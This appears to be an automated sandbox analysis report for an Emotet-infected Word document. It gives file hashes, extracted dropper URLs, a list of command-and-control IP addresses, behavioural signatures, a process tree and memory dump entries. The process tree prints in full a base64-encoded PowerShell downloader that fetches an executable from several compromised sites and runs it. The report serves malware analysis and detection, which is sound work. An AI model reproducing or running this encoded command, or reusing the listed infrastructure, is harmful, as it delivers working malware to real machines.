Analysis

  • max time kernel
    58s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    17-07-2020 18:33

General

  • Target

    1a9f759bb9bd81dec9e2703f6969d9e4f7698200c8a5589e6c22bda4cbafa086.doc

  • Size

    191KB

  • MD5

    de70b94045d8c7015fc4cd6c4a422550

  • SHA1

    dc0d255aacc4483a1f4c57d6431126add3c4cf34

  • SHA256

    1a9f759bb9bd81dec9e2703f6969d9e4f7698200c8a5589e6c22bda4cbafa086

  • SHA512

    97a4edd9fd870cf4b7957f60eb149ce0fecca5e3b17906961b8d8552204aa618bd07c6bd77fac5708b2dfe9495209f389b2835d1f34064296408b0a346c2c257

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://fivestarcleanerstx.com/wp-content/mu-plugins/2CLid868/

exe.dropper

https://bhandaraexpress.com/wp-includes/0Iw2jW2/

exe.dropper

http://crm.shaayanpharma.com/application/ffltO/

exe.dropper

http://zazabajouk.com/cf9r4nd/Xsma350581/

exe.dropper

https://e2e-solution.com/sandbox/Sv2880/

Extracted

Family

emotet

C2

177.144.135.2:80

104.247.221.104:443

201.213.32.59:80

190.147.137.153:443

178.79.163.131:8080

190.17.195.202:80

212.71.237.140:8080

68.183.190.199:8080

12.162.84.2:8080

186.250.52.226:8080

181.129.96.162:8080

185.94.252.12:80

77.55.211.77:8080

177.72.13.80:80

70.32.115.157:8080

114.109.179.60:80

68.183.170.114:8080

5.196.35.138:7080

87.106.46.107:8080

190.163.1.31:8080

rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Blacklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Office loads VBA resources, possible macro or embedded object present
  • Drops file in System32 directory 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1a9f759bb9bd81dec9e2703f6969d9e4f7698200c8a5589e6c22bda4cbafa086.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    PID:1500
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JAB4AGEAbwB4AD0AJwBoAGkAZgBmAGEAbwB6AHcAaQBhAHoAagBpAGEAcgBoAG8AbwB5AHYAdQB1AHoAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGAAYwB1AGAAUgBpAFQAWQBQAHIAYABPAGAAVABPAGMAbwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAeABpAGUAegBqAGEAdQB4AHMAaQBvAG4AcABlAGEAZgB3AG8AaQB6AGcAYQBpAGIAIAA9ACAAJwA5ADgAOAAnADsAJAB2AHUAdgBjAGUAdQB5AGoAdQB0AGgAZgBlAG8AegByAGEAdgB0AG8AaAA9ACcAagBvAG8AeAB0AGgAZQB1AHoAZABhAGkAdABsAGUAaQBrACcAOwAkAGYAaQBvAGQAZwBhAGkAcwBmAGUAYQBnAGYAaQBvAHQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHgAaQBlAHoAagBhAHUAeABzAGkAbwBuAHAAZQBhAGYAdwBvAGkAegBnAGEAaQBiACsAJwAuAGUAeABlACcAOwAkAGMAaABhAHUAZAA9ACcAcgBhAHMAbABhAHYAeQBlAGkAawBtAGUAcgByAGEAZQB0ACcAOwAkAGoAdQBhAGMAZgBvAHgAdABoAGEAbwBiAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABOAGUAdAAuAHcAZQBiAEMATABJAGUAbgB0ADsAJABnAG8AdQB0AGgAdgBhAHUAawBtAG8AYQBuAGcAbwB1AHgAcgB1AGEAbgBrAG8AdQB3AD0AJwBoAHQAdABwADoALwAvAGYAaQB2AGUAcwB0AGEAcgBjAGwAZQBhAG4AZQByAHMAdAB4AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AbQB1AC0AcABsAHUAZwBpAG4AcwAvADIAQwBMAGkAZAA4ADYAOAAvACoAaAB0AHQAcABzADoALwAvAGIAaABhAG4AZABhAHIAYQBlAHgAcAByAGUAcwBzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwAwAEkAdwAyAGoAVwAyAC8AKgBoAHQAdABwADoALwAvAGMAcgBtAC4AcwBoAGEAYQB5AGEAbgBwAGgAYQByAG0AYQAuAGMAbwBtAC8AYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AZgBmAGwAdABPAC8AKgBoAHQAdABwADoALwAvAHoAYQB6AGEAYgBhAGoAbwB1AGsALgBjAG8AbQAvAGMAZgA5AHIANABuAGQALwBYAHMAbQBhADMANQAwADUAOAAxAC8AKgBoAHQAdABwAHMAOgAvAC8AZQAyAGUALQBzAG8AbAB1AHQAaQBvAG4ALgBjAG8AbQAvAHMAYQBuAGQAYgBvAHgALwBTAHYAMgA4ADgAMAAvACcALgAiAHMAUABsAGAASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAbABlAHUAZAB0AGgAYQBvAGYAZwBlAGUAcgA9ACcAeQBlAGEAeQBsAHUAYQBnAGMAaABvAHUAYwBkAGkAYQBqAGoAdQBjAGgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGIAbwBlAG0AIABpAG4AIAAkAGcAbwB1AHQAaAB2AGEAdQBrAG0AbwBhAG4AZwBvAHUAeAByAHUAYQBuAGsAbwB1AHcAKQB7AHQAcgB5AHsAJABqAHUAYQBjAGYAbwB4AHQAaABhAG8AYgAuACIARABPAGAAVwBOAEwAbwBBAEQAYABGAEkAbABFACIAKAAkAGIAbwBlAG0ALAAgACQAZgBpAG8AZABnAGEAaQBzAGYAZQBhAGcAZgBpAG8AdAApADsAJABnAGUAZQBjAHcAZQBmAHoAbwB1AHkAPQAnAGoAdQBuAG0AbwBpAGYAeQBhAG8AegAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAGYAaQBvAGQAZwBhAGkAcwBmAGUAYQBnAGYAaQBvAHQAKQAuACIATABFAE4ARwBgAFQASAAiACAALQBnAGUAIAAzADkAMAA5ADkAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAcgBFAGAAQQB0AGUAIgAoACQAZgBpAG8AZABnAGEAaQBzAGYAZQBhAGcAZgBpAG8AdAApADsAJAB2AHUAdQBwAHQAaABpAGEAdgBmAGUAbwB5AD0AJwBoAG8AdQBxAHUAJwA7AGIAcgBlAGEAawA7ACQAYwBoAG8AaQBtAHoAaQBhAHQAcgBvAHUAcwByAG8AdQB3AG0AaQBlAGsAbgBlAGkAcQB1AD0AJwByAG8AYQBoAGMAaAB1AGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYgBhAHUAZAB3AGkAbABoAGkAYQBuAD0AJwB4AHUAdQB3ACcA
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Blacklisted process makes network request
    • Drops file in System32 directory
    PID:1796
  • C:\Users\Admin\988.exe
    C:\Users\Admin\988.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    • Drops file in System32 directory
    PID:2012
    • C:\Windows\SysWOW64\dvdupgrd\WMNetMgr.exe
      "C:\Windows\SysWOW64\dvdupgrd\WMNetMgr.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:764

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/764-195-0x0000000000330000-0x000000000033C000-memory.dmp

    Filesize

    48KB

  • memory/1500-82-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-15-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-4-0x0000000007190000-0x0000000007390000-memory.dmp

    Filesize

    2.0MB

  • memory/1500-5-0x000000000AB50000-0x000000000AB54000-memory.dmp

    Filesize

    16KB

  • memory/1500-88-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-7-0x0000000007190000-0x0000000007390000-memory.dmp

    Filesize

    2.0MB

  • memory/1500-8-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-10-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-12-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-13-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-14-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-90-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-17-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-19-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-21-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-23-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-25-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-27-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-29-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-31-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-33-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-35-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-37-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-39-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-41-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-43-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-45-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-47-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-49-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-51-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-52-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-53-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-54-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-55-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-56-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-58-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-60-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-62-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-92-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-66-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-68-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-70-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-72-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-74-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-76-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-78-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-80-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-2-0x0000000008970000-0x0000000008974000-memory.dmp

    Filesize

    16KB

  • memory/1500-84-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-86-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-6-0x000000000BBD0000-0x000000000BBD4000-memory.dmp

    Filesize

    16KB

  • memory/1500-3-0x0000000007190000-0x0000000007390000-memory.dmp

    Filesize

    2.0MB

  • memory/1500-64-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-94-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-96-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-98-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-100-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-102-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-104-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-106-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-108-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-110-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-112-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-114-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-116-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-118-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-120-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-122-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-124-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-126-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-128-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-130-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-132-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-134-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-136-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-138-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-140-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-142-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-144-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-146-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-148-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-150-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-152-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-154-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-156-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-158-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-160-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-162-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-164-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-166-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-168-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-170-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-172-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-174-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-176-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-178-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-180-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-182-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-184-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-186-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1500-188-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/2012-192-0x00000000002F0000-0x00000000002FC000-memory.dmp

    Filesize

    48KB